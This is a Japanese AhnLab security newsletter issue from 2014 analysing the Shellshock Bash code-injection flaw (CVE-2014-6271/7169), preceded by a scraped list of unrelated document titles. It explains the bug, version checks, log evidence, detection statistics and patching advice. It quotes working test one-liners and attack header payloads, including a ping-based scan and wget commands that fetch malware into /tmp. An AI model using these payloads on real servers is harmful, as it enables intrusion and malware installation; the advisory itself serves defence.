セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェ

Similar documents
Vol.71 政府機関を狙う連続ターゲット攻撃の目的は?

Vol.61 韓国と日本 同時多発的な不正アプリの拡散背景には

目次 1 はじめに AWS が提供するセキュリティモデル 責任共有モデルとセキュリティについて 検討すべきセキュリティ対策のポイント ミドルウェアの脆弱性と公開サーバに対する脅威 ミドルウェアで見つかる深刻な脆弱性..

アンラボ発信セキュリティ情報 PressAhn Pick Up! マルウェア詳細分析 相手の手札が丸見え レッドギャンブラー アンラボは韓国主要企業を対象に持続的なサイバー攻撃を実行した多数のハッキンググループを追跡中 ある攻撃グループが国内の不正ギャンブルゲームを通してマルウェアを配布したことが分

Vol.62 コインマイナーが狙う仮想通貨 Top4

2014 年上半期セキュリティトレンドを振り返る 2014 年もすでに折り返し地点を過ぎ残り数ヶ月となりました 韓国は今年 大手カード会社で起こった大量の顧客情報流出という大事件からスタートし Windows XPサポート終了 Open SSL 脆弱性発見など 様々な問題がセキュリティ業界を緊張させ

Vol.04 Partner Step-up Traning Day 2014

Vol.15 ハッカーの標的 POS システム

Vol.03 MDS メモリ分析ベースの検知技術を搭載

延命セキュリティ製品 製品名お客様の想定対象 OS McAfee Embedded Control 特定の業務で利用する物理 PC 仮想 PC や Server 2003 Server 2003 ホワイトリスト型 Trend Micro Safe Lock 特定の業務で利用するスタンドアロン PC

SQLインジェクション・ワームに関する現状と推奨する対策案

Vol.41 ランサムウェア 攻撃ルートの多角化で猛威を振るう

Microsoft IISのWebDAV認証回避の脆弱性に関する検証レポート

Focus In-Depth CyberSecurity Prediction 2018 セキュリティ環境が迎える変化 世界的なリサーチ機関 Frost&Sullivan のアナリストのチャールズ リム (Charles Lim) は2 月 アンラボ本社にて 2018 年サイバーセキュリティ展望 (

SOC Report

マルウェアレポート 2018年4月度版

2018 年 3Q(7 月 ~9 月 ) の導入企業への攻撃状況は Blacklisted user agent の攻撃が多く確認され 全体の約 60% の割合を占めており 3 ヶ月で 13,098,070 件が検知されています また 無作為に既知の脆弱性を試行する WEB アタック や 攻撃可能な

CloudEdgeあんしんプラス月次レポート解説書(1_0版) _docx

脆弱性を狙った脅威の分析と対策について Vol 年 7 月 21 日独立行政法人情報処理推進機構セキュリティセンター (IPA/ISEC) 独立行政法人情報処理推進機構 ( 略称 IPA 理事長 : 西垣浩司 ) は 2008 年度におけ る脆弱性を狙った脅威の一例を分析し 対策をまと

Symantec Endpoint Protection 12.1 の管理練習問題 例題 1. 管理外検出でネットワーク上のシステムを識別するとき 次のどのプロトコルが使用されますか a. ICMP b. TCP c. ARP a. UDP 2. ある管理者が Symantec Endpoint P

Vol.66 信頼できるマルウェア (?) に隠された真実

2016 年脅威トピック 5 生き残りをかけた適者生存競争 激化 生存競争において環境に適応したものは生き残り そうでないのは淘汰される 一言でまとめたダーウィンの進化論である これは 2016 年セキュリティ脅威の動向にも当てはまる理論であった 今年の脅威はシンプルなものから複雑なものへと進化し

OP2

McAfee Application Control ご紹介

便利 vs. 安全のはざまで揺れる 韓国モバイル決済サービス市場の実情とは モバイル決済サービス市場 勝負の行方 ダウムカカオは 9 月にリリースしたモバイル決済サービス カカオ Pay に続き 14の銀行と組んでモバイル送金 決済サービスの バンクウォレットカカオ ( 以下バンカ ) を発表した

CONTENTS 2017 年脅威動向 Top 年脅威予測 Top5

2015 年 4 月 15 日に発表された HTTP.sys の脆弱性 ( ) へ の対応について 製品名 : バージョン : 対象プラットフォーム : カテゴリ : iautolaymagic すべてすべて Web アプリ この度 マイクロソフト社製品において緊急度の高い脆弱性 (CV

Sophos Enterprise Console

WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると 以下のようなデータを使用できないように暗

マルウェアレポート 2018年1月度版

Agenda 1. 今回のバージョンアップについて a. バージョンアップ概要 b. バージョンアップ目的 c. 新バージョンのシステム要件に関する注意事項 d. 現行バージョンのサポート期間 2. 対応プラットフォームの追加 3. 新機能の追加および機能強化 2

— intra-martで運用する場合のセキュリティの考え方    

日本の上位 50 サイトのウェブセキュリティレポート (Q2 2016) 本レポートでは ウェブ閲覧リサーチ会社 Alexaにて報告された日本のユーザーから 2016 年 5 月 5 日時点の閲覧されたウェブ

JPCERT/CC インターネット定点観測レポート[2014年7月1日~9月30日]

Intel MPI Library Linux

マルウェアレポート 2017年9月度版

製品概要

ブート ~OS が起動されるまで~

Vol.63 Kimsuky の帰還 今回のターゲットは?

= SaaS型総合決済サービス = 「PGマルチペイメントサービス」のご案内

Microsoft Word - gred_security_report_vol17.final

KSforWindowsServerのご紹介

SiteLock操作マニュアル

SOC Report

FOCUS IN-DEPTH - URSNIF ANALYSIS アースニフ ステガノグラフィーで金融圏を攻撃 金融情報を奪取するマルウェアのアースニフ (Ursnif) が再び活動を再開した アースニフは金融圏で最も頻繁に発見されるマルウェアの一つであり 初期は北米 ヨーロッパ オーストラリアなど

1. 開発ツールの概要 1.1 OSS の開発ツール本書では OSS( オープンソースソフトウェア ) の開発ツールを使用します 一般に OSS は営利企業ではない特定のグループが開発するソフトウェアで ソースコードが公開されており無償で使用できます OSS は誰でも開発に参加できますが 大規模な

HULFT Series 製品における Javaの脆弱性(CVE )に対する報告

セキュリティプレス アン AhnLab ISF 顧客主導型セキュリティ 戦略を提唱 高度化された脅威に対抗する RE:SOLUTION とは? 10 月 15 日 AhnLab Integrated Security Fair( 以下 ISF2014) がソウルで開催された 企業 公共機

Template Word Document

PowerPoint プレゼンテーション

セットアップカード

(Microsoft PowerPoint - janog23-server-ipv6-rel-public.ppt [\214\335\212\267\203\202\201[\203h])

OpenAM 9.5 インストールガイド オープンソース ソリューション テクノロジ ( 株 ) 更新日 : 2013 年 7 月 19 日 リビジョン : 1.8

新製品 パソコンソフト セキュリティ対策ソフト NewsRelease 報道関係者各位 2004 年 8 月 26 日 ソースネクスト株式会社 二重の安心を提供する新発想のセキュリティ対策ソフト セキュリティアドバイザー 年 9 月 17 日 ( 金 ) 発売 ソースネクスト株式

マルウェアレポート 2018年2月度版

インテル® Parallel Studio XE 2019 Composer Edition for Fortran Windows : インストール・ガイド

McAfee Embedded Control データシート

安全な Web サイトの作り方 7 版 と Android アプリの脆弱性対策 独立行政法人情報処理推進機構 (IPA) 技術本部セキュリティセンター Copyright 2015 独立行政法人情報処理推進機構

HULFT8 for Windows/UNIX/Linux/zLinux の機能で発生する不具合について

感染条件感染経路タイプウイルス概要 前のバージョン Adobe Reader and Acrobat より前のバージョン Adobe Reader and Acrobat before より前のバージョン Adobe Flash Player before

⑵ 攻撃情報 公開時点 (1 月 3 日 ) で悪用情報無し ⑶ 対象の製品 (CPU とシステム ) 1 対象 CPU Meltdown: Intel CPU 一部の ARM 製品 Spectre: Intel AMD ARM 各社のプロセッサーに影響 2 対象システム Windows OS X

PGRelief C/C++ 強化ポイント説明書

Microsoft PowerPoint - ã…Šã…¬ã…fiㅥㅼ盋_MVISONCloud製åfi†ç´¹ä»‰.pptx

Silk Central Connect 15.5 リリースノート

プレゼンテーション

Gromacsユーザーマニュアル

McAfee Firewall for Linux リリース ノート

Red Hat Enterprise Linuxのcron(8)デーモンにデフォルト定義されたtmpwatch命令の動作による、WebOTXのトラブル対処方法

Shellshock 脆弱性 (CVE ) とは? Linux などで使用されるオープンソースプログラム bash に存在する脆弱性 bash は Linux BSD Mac OS X などの OS で使われる シェル と呼ばれるコマンドシェルの 1 つ 脆弱性が悪用されると ba

WEBシステムのセキュリティ技術

Attack Object Update

Microsoft PowerPoint - IW2009H1_nri_sakurai.pptx

リリースノート バージョン / /08/08 公開 wivia は 株式会社内 洋 の日本における登録商標です Microsoft Windows は 米国マイクロソフト社の米国及びその他の国における登録商標です Apple Mac Mac OS は 米国 A

なぜIDSIPSは必要なのか?(v1.1).ppt

不正送金対策 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム のご案内 広島県信用組合では インターネットバンキングを安心してご利用いただくため 不正送金 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム を導入しました 無料でご利用

Slide 1

グループ一覧を並び替える すべてのユーザー グループの並び順を変更する ユーザーの登録

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

吉田坂本.pptx

6-3.OS セキュリティに関する知識 OS のセキュリティ機能として必要な機能と オープンソース OS とし Ⅰ. 概要てもっとも利用が期待される Linux のセキュリティ管理に関して 電子メール Web CGI DNS などの具体的な管理手法について学ぶ Ⅱ. 対象専門分野職種共通 Ⅲ. 受講

Microsoft Word - gred_security_report_vol23_110630_final.docx

Shellshock 脆弱性 (CVE ) とは? Linux などで使 されるオープンソースプログラム bash に存在する脆弱性 bash は Linux BSD Mac OS X などの OS で使われる シェル と呼ばれるコマンドシェルの 1 つ 脆弱性が悪 されると ba

appli_HPhi_install

4. 環境要件 WebWrapper および WebWrapper 管理サーバ <Windows 版 > Windows2000Server ( サービスパック 3 また 4 適用済 ), Windows Server 2003 <Solaris 版 > SPARC CPU を搭載する Sun 製ワ

ネットワーク機器の利用における セキュリティ対策 独立行政法人情報処理推進機構技術本部セキュリティセンター大道晶平

もくじ もくじ...2 トレンドマイクロスマートホームネットワークでできること...3 スマートホームネットワーク機能を使う...4 スマートホームネットワーク設定画面...5 設定...8 セキュリティーステータス...10 セキュリティーパトロール...12 WEB サイトフィルター...14

(Microsoft Word - Avira\216j\217\343\215\305\221\254\202\314\214\237\217o\203G\203\223\203W\203\223\202\360\223\213\215\332\201I\201uAvira Free Antivi

HeartCoreインストールマニュアル

f-secure 2006 インストールガイド

Drive-by Download 攻撃に おけるRIG Exploit Kitの 解析回避手法の調査

注意事項 本文書は 2014 年 10 月 15 日時点で公開されている脆弱性情報にもとづいて作成されています 脆弱性の影響を受ける条件 改善策及び回避策等は公開情報をもとに記載しており 今後新 たに公開される情報により変更される可能性がありますのでご注意ください 目 次 1. 脆弱性の概要...

VERITAS Backup Exec for Windows Servers Management Pack for Microsoft Operations Manager ガイド

ESET Mobile Security V4.1 リリースノート (Build )

SOC Report

Corp ENT 3C PPT Template Title

サーバセキュリティサービスアップグレード手順書 Deep Security 9.6SP1 (Windows) NEC 第 1 版 2017/08/23

THREAT ANALYSIS MALICIOUS APPS 不正アプリの高度化 最新の手法と対策 最近 韓国ではボイスフィッシングと偽の金融機関アプリを組み合わせた融資詐欺事件が発生した 海外ではアイコンを隠したまま端末にインストールされた悪質なアプリが ユーザーの金融アプリとウーバー (Uber

Transcription:

2014.10 Vol.10 Bash 脆弱性を詳細分析

セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェルシ ョック ShellShock と呼ばれ セキュリティ専門家らは今年4月に世界を騒がせた ハートブリード Heartbleed よりも深 刻な脅威になりかねないとしている Bashは企業が主に使用しているサーバーOSのUNIXおよびLinuxに関連してコマンドインタプ リタの役割を果たしているため 最悪の場合は全世界のウェブサーバーの半数を麻痺させることもできる 攻撃者は悪意あるコマン ドが含まれた特殊な環境変数を使用し この脆弱性を突いて悪質な行為を実行できる 同脆弱性の影響を受けるGNU Bash環境を使 用するシステム管理者は セキュリティ更新プログラムを迅速に適用して被害を防ぐように推奨している 9月29日 Red Hat U buntu セントOS Novell/SUSEなどの主要Linux利用企業は同バグに対するパッチを発表した 今回は新たに登場したBashコードインジェクションの脆弱性と 影響を受けるバージョンや被害防止のための方法を紹介した GNU Bashの任意の環境変数において コードインジェクション Code Injection 手法を使って特定のコードを挿入し 悪意あるコードを実行で きる脆弱性が発見された Bash Bourne-again shell は Unix Linux およびMac OS X系列のOSに至るまで広範囲に使用されているコマンド シェル shell の一種であり GNUプロジェクトのために作成された 初期のUNIXシェル Bourne shell と 生まれ変わったという意味の Bor n Again の合成語で 一般的に Bash バッシュ という略語で通用する Bashはユーザーが簡単なテキストベースのWindowにコマンドを入 力すると これに応じてOSが作動するようにするコマンドインタプリタの役割を果たしている GNU プロジェクト GNUオペレーティングシステムの計画 GNU project は 1983年9月27日 net.unix-wizardsおよび net.usoft というニュー スグループで発表した その目標は 完全にフリーソフトウェアで構成されるオペレーティングシステムを実現すること だった 立案者のスト ールマンは 1960年代や1970年代のコンピュータユーザーのように ユーザーを自由にしたい と考えていた それは 使っているソフトウェ アのソースコードを使って勉強できる自由であり ソフトウェアを他の人々と共有できる自由であり ソフトウェアを修正できる自由であり 修 正版を配布できる自由である この哲学は1985年3月 GNU宣言として公表された 1990年には拡張性の高いテキストエディタ (Emacs) や 非常に広く使われている最適化コンパイラ (GCC) 一般的UNIXディストリ ビューションの基本ライブラリやユーティリティの大部分が完成した 1991年にはリーナス トーバルズが独自にLinuxカーネルの開発を始め ており 1992年にはLinuxのバージョン0.12がGPLライセンスでリリースされた そしてLinuxとGNUを組み合わせることで 世界初の完 全にフリーソフトウェアで構成されたオペレーティングシステムが完成された *出典 Wikipediaより抜粋 2

セキュリティプレス アン 米国国土安保省傘下のコンピューター緊急対応チーム (US-CERT) は 9 月 24 日 Web にて Bash 脆弱性を警告し 迅速なパッチ適用を勧告した Bash 使用有無およびバージョン確認方法 運用中のサーバーまたはサービスの Bash 使用有無および脆弱性の影響を受ける Bash バージョンの使用有無は 以下のコマンドで確認可能だ $ cat /etc/shells /bin/sh /bin/csh /bin/ksh /usr/local/bin/tcsh /usr/local/bin/bash $ bash version GNU bash, version 3.2.39(1)-release (i386-unknownopenbsd4.3) Copyright (C) 2007 Free Software Foundation, Inc. また 影響を受ける Bash バージョンの詳細情報は US-CERT で提供する以下の Web ページから確認できる < 脆弱な Bash バージョンの参考ページ > -http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6271 -http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-7169 Bash コードインジェクションの脆弱性 (CVE-2014-6271/ CVE-2014-7169) 図 1 のように 環境変数の関数定義の後に任意の実行コードを追加すると Bash で環境変数をインポートする過程で追加されたコードが一緒に実 行される bash-3.2$ env x='() { :;}; echo vulnerable bash -c echo this is a test vulnerable this is a test 図 1 脆弱性テスト (* 出典 :Red Hat の SECURITY BLOG) 最初はこの脆弱性 (CVE-2014-6271) を補完するパッチが提供されたが ファイル作成を回避するコードが確認されたため これを CVE-2014-71 69 のパッチで対応することになった ( 図 2 参照 ) 3

セキュリティプレス アン 図 2 Bash の脆弱性に関する CVE-2014-6271 および CVE-2014-7169 パッチガイド (* 出典 : US-CERT) 使用中のシステム脆弱性 CVE-2014-7169 の有無は 以下のコマンドを使って簡単にテストが可能だ bash-3.2$ $ cd /tmp; rm -f /tmp/echo; env x=() { (a)=>\ bash -c echo date ; cat /tmp/echo 他にも Bash 脆弱性スキャンツールが公開中だ これらのツールを利用して システム管理者は内部システムを安定的かつ継続的にチェックすること をお勧めする Bash コードインジェクションの脆弱性スキャン 攻撃者は 図 3 のように リモートでコードをテストして脆弱性が含まれた Bash を起動するウェブ CGI 環境を持続的に探索することが分かった # x.x.x.x および y.y.y.y は IP アドレス x.x.x.x/?referer=() { :; }; /bin/ping -c 1 y.y.y.y\x0d 図 3 Bash コードインジェクションの脆弱性対象スキャン過程 4

セキュリティプレス アン そのため 図 4 に示すように通常の Web 環境の /cgi-bin/ ディレクトリ以下の CGI プログラムにアクセスしたり ログから任意のコードインジェク ション行為が見られるか確認する必要がある GET /cgi-bin/bb-histlog.sh GET /cgi-bin/login.cgi GET /cgi-bin/web2cgi/getpass.cgi?lang=gb GET / HTTP/1.1" 200 3900 "() { :; }; /bin/ping -c 1 ip.addr 図 4 ウェブサーバーのログ上のBashコードインジェクションによる脆弱性スキャン行為 特にウェブ環境で 脆弱性を持つ Bash を起動する Web CGI プログラムが確認された場合 攻撃者は検索エンジンからそのプログラムを利用する攻撃対象のウェブサーバーを簡単に確保できてしまう これにより自動化プロセスで 多数の攻撃対象をベースにしたゾンビ ネットワーク構成の可能性も浮上している 実際に 図 5 のように 一般的なコードインジェクション手法に多く利用される連動タイプの攻撃技術が次々報告された 外部 Web サイトから悪質な実行コードをダウンロードする wget 実行コマンドのコードインジェクションにより 外部 Web サイトから DoS 機能を持つ Linux 型マルウェア (V3 診断名 : Linux/CVE-2014-6271) および IRCBot 機能を持つ Perl スクリプト型マルウェア (Perl/ Shellbot) を /tmp スペースに保存 実行する攻撃方法をとっている Cookie: () { :; }; wget. User-Agent: () { :;}; wget.cookie:().{.:;.}; wget.host:().{.:;.}; wget..referer:().{.:;.};.wget 図 5 wget 実行コマンドのコードインジェクション攻撃手法 現在 Bash 脆弱性を利用すれば 攻撃者は Web サーバーのコンテンツおよびコード変更 Web サイト改ざん ユーザーのデータ流出や DDoS 攻撃が実 行可能となる この他にも SSH DHCP プロトコルなどさまざまな環境下で Bash コードインジェクションの脆弱性攻撃のシナリオが提起されている 状況だ Bash コードインジェクションの脆弱性検知件数が持続的に増加アンラボは自社のネットワーク統合セキュリティソリューション TrusGuard( トラスガード ) に同脆弱性に関するシグネチャを適用 モニタリングした結果 図 6 のように Bash コードインジェクションの脆弱性検知件数が最近持続的に増加していることが確認された これはBash コードインジェクションの脆弱性をスキャンするツールの増加と 同脆弱性を悪用する実際の攻撃から起因するものと推測できる 当分はこのような傾向が続くと予想されるだけに セキュリティ担当者の継続的なモニタリングと対応が必要だ 5

セキュリティプレス アン TrusGuardシグネチャ名 bash_code_injection (CVE-2014-6271) シグネチャ 配布当日 1日後 2 日後 3 日後 4 日後 1109 1069 625 1394 4529 1日後 2日後 3日後 4日後 配布当日 図6 TrusGuardのBashコードインジェクション脆弱性の検知件数推移 Bashコードインジェクションの脆弱性に対応する まず使用中のシステム サービスのBash脆弱性の影響有無を把握し 関連するセキュリティ更新プログラムを迅速に適用すること またBashコード インジェクションの脆弱性を悪用する 任意のリモートコード攻撃へのモニタリングを強化し 侵入防止システム IPS を利用して被害を最小化す ることも重要だ この他 脆弱なBashバージョンを使用するウェブCGIプログラムを運営するウェブサーバーの有無を確認し 必要な場合を除きCG Iプログラムサービスを停止したり削除することも必要だ 一方 既存の脆弱性が解決 修正 されたとしても攻撃者は持続的に回避方法を研究するだろう Bash脆弱性に関するパッチを適用後も 当分は同 脆弱性に関して注意深くモニタリングし 新規セキュリティ更新プログラムを常に迅速に適用して最新のセキュリティ状態を維持することが重要だ アンラボは今回のBash脆弱性に関する脅威を継続してモニタリングし 注意を呼びかけることで企業および一般ユーザーの被害を最小化するため最 善を尽くしている <Bash脆弱性に関するセキュリティアドバイザーサイト> アンラボ セキュリティアドバイザー http://www.ahnlab.com/kr/site/securitycenter/asec/asecview.do?groupcode=vni002& webnewsinfounionvo.seq=22903 6

セキュリティプレス アン < 参考サイト > http://hacksum.net/ www.redhat.com Trend Micro Blog http://blog.trendmicro.com/trendlabs-security-intelligence/bashvulnerability-shellshock-exploit-emerges-in-thewild-leads-toflooder/ Red Hat Blog https://securityblog.redhat.com/2014/09/24/bash-speciallycrafted-environment-variables-code-injection-attack/ 7

http://www.ahnlab.co.jp http://global.ahnlab.com http://www.ahnlab.com アンラボとは株式会社アンラボは 業界をリードする情報セキュリティソリューションの開発会社です 1995 年から弊社では情報セキュリティ分野におけるイノベーターとして最先端技術と高品質のサービスをご提供できるように努力を傾けてまいりました 今後もお客様のビジネス継続性をお守りし 安心できるIT 環境づくりに貢献しながらセキュリティ業界の先駆者になれるよう邁進してまいります アンラボはデスクトップおよびサーバー 携帯電話 オンライントランザクション ネットワークアプライアンスなど多岐にわたる総合セキュリティ製品のラインナップを揃えております どの製品も世界トップクラスのセキュリティレベルを誇り グローバル向けコンサルタントサービスを含む包括的なセキュリティサービスをお届け致します 101-002 東京都千代田区外神田 4-14-1 秋葉原 UDX 8 階北 Tel : 03-5209-8610 ( 代 ) 2014 AhnLab, Inc. All rights reserved.